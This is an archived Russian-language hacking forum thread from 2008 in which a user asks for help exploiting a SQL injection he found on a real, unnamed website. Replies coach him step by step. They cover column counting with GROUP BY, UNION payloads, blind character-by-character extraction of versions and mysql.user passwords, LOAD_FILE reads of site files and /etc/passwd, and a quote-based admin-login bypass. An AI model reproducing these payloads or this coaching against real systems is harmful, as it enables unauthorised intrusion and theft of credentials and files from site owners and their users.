Просмотр полной версии : различные результат на *group+by* и *union+select*
Вот блин штука какая. На одном из сайтов нашел стандартную sql-инъекцию.
Запрос типа site.com/?nr=1' выдает ошибку "mysql_fetch_array()....". Скуль на лицо, с помощью запроса site.com/?nr=1+group+by+5/* появляется ошибка, стало быть кол-во столбцов 4 (при site.com/?nr=1+group+by+4/* - ошибки нет), значит должен быть верен запрос типа site.com/?nr=1+union+select+1,2,3,4/* ну или хотя бы site.com/?nr=1+union+select+null,null,null,null/*.
Как не вертел, данные запросы вес равно выдают ошибку(
При использовании order+by так же нет ошибок.
В чем может быть проблема. Я предполагаю, что скрипт фильтрует в запросе второй select и так реагирует.
Shao Kan
28.07.2008, 16:21
юзай sql injection tool 4
1. Ты подставляешь юнион к существующему значению, а надо к несуществующему (...1+and+1=2+union+...).
2. Возможно там несколько запросов (в таком случае посимвольный брут).
3. Версия мускула = 3 (+and+substring(version(),1,1)=3 - это что бы проверить) и следовательно подзапросы не поддерживаются.
Читай статью:
https://forum.antichat.ru/threadnav43966-1-10.html
spider-intruder
28.07.2008, 16:24
м.б. там просто 3 версия секеля и нет юниона ;-)?
Если четвёртая версия это ещё не означает поддержку подзапросов.Вот какая точная версия,с которой начинается поддержка подзапросов - не помню...).Про третью вообще молчу))
Если четвёртая версия это ещё не означает поддержку подзапросов.Вот какая точная версия,с которой начинается поддержка подзапросов - не помню...).Про третью вообще молчу))
Подзапросы поддерживаются MySQL >4.1
Правда, тут о них речи не было, UNION не является частью подзапроса.
Подзапрос имеется, скажем, в этом примере:
SELECT 1,2,(SELECT `passwd` FROM `users` limit 0,1) from mysql.user;
или
SELECT `password` FROM `users` WHERE `id` = (SELECT `user_id` FROM `comments` limit 155,1);
Подзапросы поддерживаются MySQL >4.1
Правда, тут о них речи не было, UNION не является частью подзапроса.
Подзапрос имеется, скажем, в этом примере:
SELECT 1,2,(SELECT `passwd` FROM `users` limit 0,1) from mysql.user;
или
SELECT `password` FROM `users` WHERE `id` = (SELECT `user_id` FROM `comments` limit 155,1);
Хыхы))А мне всегда почему-то казалось, что подзапрос -
это выражения вида 1+and+substring(version(),1,1)=5;
или 1+and+1=5+union+select; Выполнится второй
запрос,а первый улетает.Так эт чо - один большой запрос или всё же два?)).
Уф...
Bonnie and Clyde
28.07.2008, 19:41
попробуй site.com/?nr=-9999+union+select+1,2,3,4/* несуществующее значание
Хыхы))А мне всегда почему-то казалось, что подзапрос -
это выражения вида 1+and+substring(version(),1,1)=5;
Это не подзапрос, а использование логического опретора and.
В запросе получается что то вроде этого:
select title from page where page_id=[sql inj]
Смысл запроса вывести заголовок указанной страницы.
Сюда ты и подставляешь данные:
select title from page where page_id=1 and substring(version(),1,1)=5
Смысл вывести заголовок указанной страницы и первый символ версии БД должен быть равен 5.
Т.е. запрос выполнится успешно если верси БД равна 5.
substring() и version() это функции.
В данном примере ты используешь логический опрератор and и две функции, а подзапросы не используешь.
Ограничиваясь такими логическими посимвольными учтонениями запроса, используя только функции и не используя подзапросы максимум что ты можешь сделать это вывести содержимое файла (и то если пользователь БД обладает соотвествующими правами) - подробнее тут => Работа с MySQL третьей версии... (https://forum.antichat.ru/showpost.php?p=565034&postcount=4)
или 1+and+1=5+union+select; Выполнится второй
запрос,а первый улетает.Так эт чо - один большой запрос или всё же два?)).
Уф...
union - это опретор объединяющий два запроса:
select title from page where page_id=1 and substring(version(),1,1)=5 union select 1
В данном случае если версия БД не равна 5, то выведется еденица.
Подробнее тут => SQL injection полный FAQ (https://forum.antichat.ru/threadnav43966-1-10.html)
Подзапросы используются для работы со слепыми инъекциями:
select title from page where page_id=1 and (select 1 from user limit 0,1)=1
Подробнее про слепые инъекции тут => SQL инъекция FAQ (в т.ч. и blind SQL) (https://forum.antichat.ru/thread19844.html)
P.S. а вообще очень советую купить справочник/учебник по синтаксису sql.
мне кажется, что учше нам увидеть эту ссылку)
попробуй site.com/?nr=-9999+union+select+1,2,3,4/* несуществующее значание
попробовал, также не подходит)
Но немного пораздумав и почитав, что Grey написал, попробовал логические запросы с and.
Как и ожидалось версия оказалась 3.х и соответственно union не поддерживаются :mad: С помощью перлового скрипта перебрал user(), version(), database().
Запрос, типа site.com/?nr=1+and+ascii(substring((select+password+from+my sql.user),1,1))>1/*
тоже не проканал, то ли это расценено как подзапрос, то ли доступа к mysql.user закрыт.
Статья Grey о том как сливать файлы в 3-й версии, если есть доступ, наталкнула на такой запрос
http://site.com/?nr=1&n=1+and+ascii(substring((LOAD_FILE(0x2f7777772f777 777382f757a2f64656661756c742e68746d)),100,1))>1/*
При его подачи ошибок нет, но и добиться, чтобы условие выполнилось, тоже не смог (захексин путь до файла, который выводится при ошибочной квери)
Запрос, типа site.com/?nr=1+and+ascii(substring((select+password+from+my sql.user),1,1))>1/*
тоже не проканал, то ли это расценено как подзапрос, то ли доступа к mysql.user закрыт.
Это и есть подзапрос.
При его подачи ошибок нет, но и добиться, чтобы условие выполнилось, тоже не смог (захексин путь до файла, который выводится при ошибочной квери)
Скорее всего результат функции = null.
Тут два варианта:
1. Пользователь БД не имеет прав на чтение/запись файлов.
2. Нельзя прочитать файл находящийся в /www (права на файлы поставленные жестко).
Проверь можешь ли ты прочитать файл /etc/passwd - если ты и его не сможешь прочитать, то у пользователя БД явно нету соотвествующих привилегий - тут уж ничего не поделаешь.
Вот что ещё может помочь тебе во взломе с помощью sql инъекций:
Т.к. ты уже нашел на сайте уязвимый скрипт, то вполне возможно что есть и другие скрипты подверженные sql инъекциям, а именно:
1. SQL инъекция при авторизации в админке, т.е. вместо логина и пароля прописывай:
1' or 1=1/*
Но при этом кавычки не должны фильтроваться.
2. Попробуй найти скрипт который работает с таблицей пользователей (выводит список пользователей или к примеру их email'ы) и в нём найти sql инъекцию и в таком случае ты можешь обойтись без подзапросов, а просто логичискими уточнениями:
php?id=1+and+ascii(substring(username,1,1))>1
Врятли можно найти другие способы, но по крайней мере у тебя есть раскрытый пусть, может если найдешь инклуд или читалку, то может он поможет.
Проверь можешь ли ты прочитать файл /etc/passwd - если ты и его не сможешь прочитать, то у пользователя БД явно нету соотвествующих привилегий - тут уж ничего не поделаешь.
что и требовалось доказать, прав чтения не оказалось, так как опять вернулся нулевой результат. Спасибо, Grey, за интересные идеи, буду в другом направлении копать.
guest3297
30.07.2008, 12:24
99% Думаю надо юзать конструкцию типо.
1'+and+1=
1')+and+1=
']99% Думаю надо юзать конструкцию типо.
1'+and+1=
1')+and+1=
Ты его пост читал? он ведь уже написал что смог определить что версия БД = 3.
Вот процитирую:
Как и ожидалось версия оказалась 3.х и соответственно union не поддерживаются С помощью перлового скрипта перебрал user(), version(), database().
Если он смог вывести польностью user(), version(), database(), то значит дело точно не в закрытие кавычки или скобки.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot